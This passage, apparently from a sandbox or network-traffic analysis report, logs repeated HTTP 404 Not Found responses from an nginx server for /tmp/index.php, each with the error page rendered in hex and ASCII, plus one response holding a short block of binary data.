"-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:08:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD 